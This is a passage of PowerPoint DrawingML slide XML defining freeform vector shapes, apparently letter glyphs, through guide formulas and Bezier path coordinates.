                <a:gd name="T4" fmla="*/ 102 w 240"/>
                <a:gd name="T5" fmla="*/ 33 h 335"/>
                <a:gd name="T6" fmla="*/ 150 w 240"/>
                <a:gd name="T7" fmla="*/ 82 h 335"/>
                <a:gd name="T8" fmla="*/ 102 w 240"/>
                <a:gd name="T9" fmla="*/ 133 h 335"/>
                <a:gd name="T10" fmla="*/ 57 w 240"/>
                <a:gd name="T11" fmla="*/ 150 h 335"/>
                <a:gd name="T12" fmla="*/ 102 w 240"/>
                <a:gd name="T13" fmla="*/ 163 h 335"/>
                <a:gd name="T14" fmla="*/ 184 w 240"/>
                <a:gd name="T15" fmla="*/ 82 h 335"/>
                <a:gd name="T16" fmla="*/ 171 w 240"/>
                <a:gd name="T17" fmla="*/ 39 h 335"/>
                <a:gd name="T18" fmla="*/ 200 w 240"/>
                <a:gd name="T19" fmla="*/ 31 h 335"/>
                <a:gd name="T20" fmla="*/ 220 w 240"/>
                <a:gd name="T21" fmla="*/ 47 h 335"/>
                <a:gd name="T22" fmla="*/ 240 w 240"/>
                <a:gd name="T23" fmla="*/ 27 h 335"/>
                <a:gd name="T24" fmla="*/ 203 w 240"/>
                <a:gd name="T25" fmla="*/ 0 h 335"/>
                <a:gd name="T26" fmla="*/ 150 w 240"/>
                <a:gd name="T27" fmla="*/ 18 h 335"/>
                <a:gd name="T28" fmla="*/ 102 w 240"/>
                <a:gd name="T29" fmla="*/ 3 h 335"/>
                <a:gd name="T30" fmla="*/ 20 w 240"/>
                <a:gd name="T31" fmla="*/ 82 h 335"/>
                <a:gd name="T32" fmla="*/ 36 w 240"/>
                <a:gd name="T33" fmla="*/ 130 h 335"/>
                <a:gd name="T34" fmla="*/ 26 w 240"/>
                <a:gd name="T35" fmla="*/ 164 h 335"/>
                <a:gd name="T36" fmla="*/ 37 w 240"/>
                <a:gd name="T37" fmla="*/ 200 h 335"/>
                <a:gd name="T38" fmla="*/ 0 w 240"/>
                <a:gd name="T39" fmla="*/ 261 h 335"/>
                <a:gd name="T40" fmla="*/ 117 w 240"/>
                <a:gd name="T41" fmla="*/ 335 h 335"/>
                <a:gd name="T42" fmla="*/ 233 w 240"/>
                <a:gd name="T43" fmla="*/ 261 h 335"/>
                <a:gd name="T44" fmla="*/ 198 w 240"/>
                <a:gd name="T45" fmla="*/ 205 h 335"/>
                <a:gd name="T46" fmla="*/ 126 w 240"/>
                <a:gd name="T47" fmla="*/ 190 h 335"/>
                <a:gd name="T48" fmla="*/ 91 w 240"/>
                <a:gd name="T49" fmla="*/ 190 h 335"/>
                <a:gd name="T50" fmla="*/ 77 w 240"/>
                <a:gd name="T51" fmla="*/ 189 h 335"/>
                <a:gd name="T52" fmla="*/ 60 w 240"/>
                <a:gd name="T53" fmla="*/ 182 h 335"/>
                <a:gd name="T54" fmla="*/ 54 w 240"/>
                <a:gd name="T55" fmla="*/ 164 h 335"/>
                <a:gd name="T56" fmla="*/ 57 w 240"/>
                <a:gd name="T57" fmla="*/ 150 h 335"/>
                <a:gd name="T58" fmla="*/ 117 w 240"/>
                <a:gd name="T59" fmla="*/ 305 h 335"/>
                <a:gd name="T60" fmla="*/ 29 w 240"/>
                <a:gd name="T61" fmla="*/ 261 h 335"/>
                <a:gd name="T62" fmla="*/ 50 w 240"/>
                <a:gd name="T63" fmla="*/ 227 h 335"/>
                <a:gd name="T64" fmla="*/ 103 w 240"/>
                <a:gd name="T65" fmla="*/ 219 h 335"/>
                <a:gd name="T66" fmla="*/ 204 w 240"/>
                <a:gd name="T67" fmla="*/ 261 h 335"/>
                <a:gd name="T68" fmla="*/ 117 w 240"/>
                <a:gd name="T69" fmla="*/ 30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0" h="335">
                  <a:moveTo>
                    <a:pt x="102" y="133"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="133"/>
                    <a:pt x="54" y="109"/>
                    <a:pt x="54" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="54"/>
                    <a:pt x="76" y="33"/>
                    <a:pt x="102" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="33"/>
                    <a:pt x="150" y="56"/>
                    <a:pt x="150" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="111"/>
                    <a:pt x="128" y="133"/>
                    <a:pt x="102" y="133"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="57" y="150"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="151"/>
                    <a:pt x="78" y="163"/>
                    <a:pt x="102" y="163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="163"/>
                    <a:pt x="184" y="127"/>
                    <a:pt x="184" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="67"/>
                    <a:pt x="180" y="53"/>
                    <a:pt x="171" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="33"/>
                    <a:pt x="194" y="31"/>
                    <a:pt x="200" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="44"/>
                    <a:pt x="215" y="47"/>
                    <a:pt x="220" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="228" y="47"/>
                    <a:pt x="240" y="42"/>
                    <a:pt x="240" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240" y="16"/>
                    <a:pt x="230" y="0"/>
                    <a:pt x="203" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="0"/>
                    <a:pt x="173" y="1"/>
                    <a:pt x="150" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="12"/>
                    <a:pt x="125" y="3"/>
                    <a:pt x="102" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="3"/>
                    <a:pt x="20" y="40"/>
                    <a:pt x="20" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="104"/>
                    <a:pt x="28" y="120"/>
                    <a:pt x="36" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="138"/>
                    <a:pt x="26" y="149"/>
                    <a:pt x="26" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="181"/>
                    <a:pt x="33" y="194"/>
                    <a:pt x="37" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="222"/>
                    <a:pt x="0" y="256"/>
                    <a:pt x="0" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="304"/>
                    <a:pt x="53" y="335"/>
                    <a:pt x="117" y="335"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="335"/>
                    <a:pt x="233" y="304"/>
                    <a:pt x="233" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="233" y="243"/>
                    <a:pt x="224" y="218"/>
                    <a:pt x="198" y="205"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="201"/>
                    <a:pt x="171" y="190"/>
                    <a:pt x="126" y="190"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="91" y="190"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="190"/>
                    <a:pt x="81" y="190"/>
                    <a:pt x="77" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="189"/>
                    <a:pt x="66" y="189"/>
                    <a:pt x="60" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="175"/>
                    <a:pt x="54" y="165"/>
                    <a:pt x="54" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="162"/>
                    <a:pt x="55" y="155"/>
                    <a:pt x="57" y="150"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="117" y="305"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="305"/>
                    <a:pt x="29" y="283"/>
                    <a:pt x="29" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="252"/>
                    <a:pt x="34" y="236"/>
                    <a:pt x="50" y="227"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="219"/>
                    <a:pt x="67" y="219"/>
                    <a:pt x="103" y="219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="219"/>
                    <a:pt x="204" y="219"/>
                    <a:pt x="204" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="283"/>
                    <a:pt x="166" y="305"/>
                    <a:pt x="117" y="30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24" name="Rectangle 865">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF89099E-47F0-477F-8815-BA17431F581C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId41"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3606801" y="2027238"/>
              <a:ext cx="90488" cy="6350"/>
            </a:xfrm>
            <a:prstGeom prst="rect">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25" name="Freeform 866">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB1075FD-91DD-4E8C-BB2C-89834907EFB7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId42"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3702051" y="1909763"/>
              <a:ext cx="73025" cy="98425"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 99 w 212"/>
                <a:gd name="T1" fmla="*/ 92 h 280"/>
                <a:gd name="T2" fmla="*/ 180 w 212"/>
                <a:gd name="T3" fmla="*/ 92 h 280"/>
                <a:gd name="T4" fmla="*/ 200 w 212"/>
                <a:gd name="T5" fmla="*/ 77 h 280"/>
                <a:gd name="T6" fmla="*/ 180 w 212"/>
                <a:gd name="T7" fmla="*/ 62 h 280"/>
                <a:gd name="T8" fmla="*/ 99 w 212"/>
                <a:gd name="T9" fmla="*/ 62 h 280"/>
                <a:gd name="T10" fmla="*/ 99 w 212"/>
                <a:gd name="T11" fmla="*/ 21 h 280"/>
                <a:gd name="T12" fmla="*/ 82 w 212"/>
                <a:gd name="T13" fmla="*/ 0 h 280"/>
                <a:gd name="T14" fmla="*/ 64 w 212"/>
                <a:gd name="T15" fmla="*/ 21 h 280"/>
                <a:gd name="T16" fmla="*/ 64 w 212"/>
                <a:gd name="T17" fmla="*/ 62 h 280"/>
                <a:gd name="T18" fmla="*/ 21 w 212"/>
                <a:gd name="T19" fmla="*/ 62 h 280"/>
                <a:gd name="T20" fmla="*/ 0 w 212"/>
                <a:gd name="T21" fmla="*/ 77 h 280"/>
                <a:gd name="T22" fmla="*/ 20 w 212"/>
                <a:gd name="T23" fmla="*/ 92 h 280"/>
                <a:gd name="T24" fmla="*/ 64 w 212"/>
                <a:gd name="T25" fmla="*/ 92 h 280"/>
                <a:gd name="T26" fmla="*/ 64 w 212"/>
                <a:gd name="T27" fmla="*/ 214 h 280"/>
                <a:gd name="T28" fmla="*/ 134 w 212"/>
                <a:gd name="T29" fmla="*/ 280 h 280"/>
                <a:gd name="T30" fmla="*/ 212 w 212"/>
                <a:gd name="T31" fmla="*/ 214 h 280"/>
                <a:gd name="T32" fmla="*/ 194 w 212"/>
                <a:gd name="T33" fmla="*/ 194 h 280"/>
                <a:gd name="T34" fmla="*/ 177 w 212"/>
                <a:gd name="T35" fmla="*/ 213 h 280"/>
                <a:gd name="T36" fmla="*/ 137 w 212"/>
                <a:gd name="T37" fmla="*/ 249 h 280"/>
                <a:gd name="T38" fmla="*/ 99 w 212"/>
                <a:gd name="T39" fmla="*/ 211 h 280"/>
                <a:gd name="T40" fmla="*/ 99 w 212"/>
                <a:gd name="T41" fmla="*/ 9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80">
                  <a:moveTo>
                    <a:pt x="99" y="92"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="180" y="92"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="92"/>
                    <a:pt x="200" y="92"/>
                    <a:pt x="200" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="62"/>
                    <a:pt x="188" y="62"/>
                    <a:pt x="180" y="62"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="99" y="62"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="11"/>
                    <a:pt x="99" y="0"/>
                    <a:pt x="82" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="0"/>
                    <a:pt x="64" y="11"/>
                    <a:pt x="64" y="21"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="62"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="62"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="62"/>
                    <a:pt x="0" y="62"/>
                    <a:pt x="0" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="92"/>
                    <a:pt x="13" y="92"/>
                    <a:pt x="20" y="92"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="92"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64" y="214"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="262"/>
                    <a:pt x="98" y="280"/>
                    <a:pt x="134" y="280"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="280"/>
                    <a:pt x="212" y="258"/>
                    <a:pt x="212" y="214"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="205"/>
                    <a:pt x="212" y="194"/>
                    <a:pt x="194" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="194"/>
                    <a:pt x="177" y="205"/>
                    <a:pt x="177" y="213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="244"/>
                    <a:pt x="148" y="249"/>
                    <a:pt x="137" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="249"/>
                    <a:pt x="99" y="223"/>
                    <a:pt x="99" y="211"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="99"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26" name="Freeform 867">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9D9A15F-0B45-47AB-A842-682A11D2DCC7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId43"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3800476" y="1928813"/>
              <a:ext cx="66675" cy="79375"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 113 w 193"/>
                <a:gd name="T1" fmla="*/ 92 h 223"/>
                <a:gd name="T2" fmla="*/ 79 w 193"/>
                <a:gd name="T3" fmla="*/ 86 h 223"/>
                <a:gd name="T4" fmla="*/ 31 w 193"/>
                <a:gd name="T5" fmla="*/ 59 h 223"/>
                <a:gd name="T6" fmla="*/ 94 w 193"/>
                <a:gd name="T7" fmla="*/ 31 h 223"/>
                <a:gd name="T8" fmla="*/ 144 w 193"/>
                <a:gd name="T9" fmla="*/ 58 h 223"/>
                <a:gd name="T10" fmla="*/ 161 w 193"/>
                <a:gd name="T11" fmla="*/ 75 h 223"/>
                <a:gd name="T12" fmla="*/ 178 w 193"/>
                <a:gd name="T13" fmla="*/ 55 h 223"/>
                <a:gd name="T14" fmla="*/ 178 w 193"/>
                <a:gd name="T15" fmla="*/ 21 h 223"/>
                <a:gd name="T16" fmla="*/ 164 w 193"/>
                <a:gd name="T17" fmla="*/ 0 h 223"/>
                <a:gd name="T18" fmla="*/ 149 w 193"/>
                <a:gd name="T19" fmla="*/ 11 h 223"/>
                <a:gd name="T20" fmla="*/ 95 w 193"/>
                <a:gd name="T21" fmla="*/ 0 h 223"/>
                <a:gd name="T22" fmla="*/ 0 w 193"/>
                <a:gd name="T23" fmla="*/ 59 h 223"/>
                <a:gd name="T24" fmla="*/ 99 w 193"/>
                <a:gd name="T25" fmla="*/ 120 h 223"/>
                <a:gd name="T26" fmla="*/ 163 w 193"/>
                <a:gd name="T27" fmla="*/ 157 h 223"/>
                <a:gd name="T28" fmla="*/ 99 w 193"/>
                <a:gd name="T29" fmla="*/ 192 h 223"/>
                <a:gd name="T30" fmla="*/ 35 w 193"/>
                <a:gd name="T31" fmla="*/ 148 h 223"/>
                <a:gd name="T32" fmla="*/ 18 w 193"/>
                <a:gd name="T33" fmla="*/ 133 h 223"/>
                <a:gd name="T34" fmla="*/ 0 w 193"/>
                <a:gd name="T35" fmla="*/ 154 h 223"/>
                <a:gd name="T36" fmla="*/ 0 w 193"/>
                <a:gd name="T37" fmla="*/ 202 h 223"/>
                <a:gd name="T38" fmla="*/ 15 w 193"/>
                <a:gd name="T39" fmla="*/ 223 h 223"/>
                <a:gd name="T40" fmla="*/ 34 w 193"/>
                <a:gd name="T41" fmla="*/ 204 h 223"/>
                <a:gd name="T42" fmla="*/ 99 w 193"/>
                <a:gd name="T43" fmla="*/ 223 h 223"/>
                <a:gd name="T44" fmla="*/ 193 w 193"/>
                <a:gd name="T45" fmla="*/ 157 h 223"/>
                <a:gd name="T46" fmla="*/ 113 w 193"/>
                <a:gd name="T47" fmla="*/ 9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3">
                  <a:moveTo>
                    <a:pt x="113" y="92"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="90"/>
                    <a:pt x="92" y="89"/>
                    <a:pt x="79" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="84"/>
                    <a:pt x="31" y="78"/>
                    <a:pt x="31" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="46"/>
                    <a:pt x="47" y="31"/>
                    <a:pt x="94" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="31"/>
                    <a:pt x="143" y="45"/>
                    <a:pt x="144" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="67"/>
                    <a:pt x="146" y="75"/>
                    <a:pt x="161" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="75"/>
                    <a:pt x="178" y="65"/>
                    <a:pt x="178" y="55"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="178" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="13"/>
                    <a:pt x="178" y="0"/>
                    <a:pt x="164" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="152" y="0"/>
                    <a:pt x="150" y="7"/>
                    <a:pt x="149" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="0"/>
                    <a:pt x="105" y="0"/>
                    <a:pt x="95" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="41"/>
                    <a:pt x="0" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="105"/>
                    <a:pt x="53" y="113"/>
                    <a:pt x="99" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="124"/>
                    <a:pt x="163" y="131"/>
                    <a:pt x="163" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="176"/>
                    <a:pt x="145" y="192"/>
                    <a:pt x="99" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="192"/>
                    <a:pt x="48" y="187"/>
                    <a:pt x="35" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="139"/>
                    <a:pt x="31" y="133"/>
                    <a:pt x="18" y="133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="133"/>
                    <a:pt x="0" y="144"/>
                    <a:pt x="0" y="154"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="202"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="210"/>
                    <a:pt x="0" y="223"/>
                    <a:pt x="15" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="223"/>
                    <a:pt x="28" y="222"/>
                    <a:pt x="34" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="222"/>
                    <a:pt x="85" y="223"/>
                    <a:pt x="99" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="223"/>
                    <a:pt x="193" y="181"/>
                    <a:pt x="193" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="105"/>
                    <a:pt x="129" y="95"/>
                    <a:pt x="113" y="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27" name="Freeform 868">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50E35EEB-8979-4784-AB6D-9F3756A0B076}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId44"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3900488" y="1897063"/>
              <a:ext cx="46038" cy="52388"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 46 w 136"/>
                <a:gd name="T1" fmla="*/ 28 h 147"/>
                <a:gd name="T2" fmla="*/ 24 w 136"/>
                <a:gd name="T3" fmla="*/ 0 h 147"/>
                <a:gd name="T4" fmla="*/ 1 w 136"/>
                <a:gd name="T5" fmla="*/ 28 h 147"/>
                <a:gd name="T6" fmla="*/ 8 w 136"/>
                <a:gd name="T7" fmla="*/ 129 h 147"/>
                <a:gd name="T8" fmla="*/ 24 w 136"/>
                <a:gd name="T9" fmla="*/ 147 h 147"/>
                <a:gd name="T10" fmla="*/ 39 w 136"/>
                <a:gd name="T11" fmla="*/ 130 h 147"/>
                <a:gd name="T12" fmla="*/ 46 w 136"/>
                <a:gd name="T13" fmla="*/ 28 h 147"/>
                <a:gd name="T14" fmla="*/ 134 w 136"/>
                <a:gd name="T15" fmla="*/ 28 h 147"/>
                <a:gd name="T16" fmla="*/ 112 w 136"/>
                <a:gd name="T17" fmla="*/ 0 h 147"/>
                <a:gd name="T18" fmla="*/ 90 w 136"/>
                <a:gd name="T19" fmla="*/ 28 h 147"/>
                <a:gd name="T20" fmla="*/ 96 w 136"/>
                <a:gd name="T21" fmla="*/ 129 h 147"/>
                <a:gd name="T22" fmla="*/ 112 w 136"/>
                <a:gd name="T23" fmla="*/ 147 h 147"/>
                <a:gd name="T24" fmla="*/ 128 w 136"/>
                <a:gd name="T25" fmla="*/ 130 h 147"/>
                <a:gd name="T26" fmla="*/ 134 w 136"/>
                <a:gd name="T27" fmla="*/ 2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47">
                  <a:moveTo>
                    <a:pt x="46" y="28"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="4"/>
                    <a:pt x="30" y="0"/>
                    <a:pt x="24" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="0"/>
                    <a:pt x="0" y="6"/>
                    <a:pt x="1" y="28"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8" y="129"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="136"/>
                    <a:pt x="10" y="147"/>
                    <a:pt x="24" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="147"/>
                    <a:pt x="39" y="138"/>
                    <a:pt x="39" y="130"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="46" y="28"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="134" y="28"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="4"/>
                    <a:pt x="119" y="0"/>
                    <a:pt x="112" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="0"/>
                    <a:pt x="88" y="6"/>
                    <a:pt x="90" y="28"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="96" y="129"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="136"/>
                    <a:pt x="98" y="147"/>
                    <a:pt x="112" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="125" y="147"/>
                    <a:pt x="127" y="138"/>
                    <a:pt x="128" y="130"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="134"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28" name="Freeform 869">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE420D06-DFA4-466C-8E43-35DB149D8B87}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId45"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4002088" y="1930401"/>
              <a:ext cx="22225" cy="76200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 63 w 63"/>
                <a:gd name="T1" fmla="*/ 31 h 215"/>
                <a:gd name="T2" fmla="*/ 32 w 63"/>
                <a:gd name="T3" fmla="*/ 0 h 215"/>
                <a:gd name="T4" fmla="*/ 0 w 63"/>
                <a:gd name="T5" fmla="*/ 31 h 215"/>
                <a:gd name="T6" fmla="*/ 31 w 63"/>
                <a:gd name="T7" fmla="*/ 62 h 215"/>
                <a:gd name="T8" fmla="*/ 63 w 63"/>
                <a:gd name="T9" fmla="*/ 31 h 215"/>
                <a:gd name="T10" fmla="*/ 63 w 63"/>
                <a:gd name="T11" fmla="*/ 184 h 215"/>
                <a:gd name="T12" fmla="*/ 32 w 63"/>
                <a:gd name="T13" fmla="*/ 152 h 215"/>
                <a:gd name="T14" fmla="*/ 0 w 63"/>
                <a:gd name="T15" fmla="*/ 183 h 215"/>
                <a:gd name="T16" fmla="*/ 31 w 63"/>
                <a:gd name="T17" fmla="*/ 215 h 215"/>
                <a:gd name="T18" fmla="*/ 63 w 63"/>
                <a:gd name="T19" fmla="*/ 1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15">
                  <a:moveTo>
                    <a:pt x="63" y="31"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="13"/>
                    <a:pt x="48" y="0"/>
                    <a:pt x="32" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="0"/>
                    <a:pt x="0" y="15"/>
                    <a:pt x="0" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="49"/>
                    <a:pt x="15" y="62"/>
                    <a:pt x="31" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="62"/>
                    <a:pt x="63" y="46"/>
                    <a:pt x="63" y="31"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="63" y="184"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="165"/>
                    <a:pt x="48" y="152"/>
                    <a:pt x="32" y="152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="152"/>
                    <a:pt x="0" y="168"/>
                    <a:pt x="0" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="202"/>
                    <a:pt x="15" y="215"/>
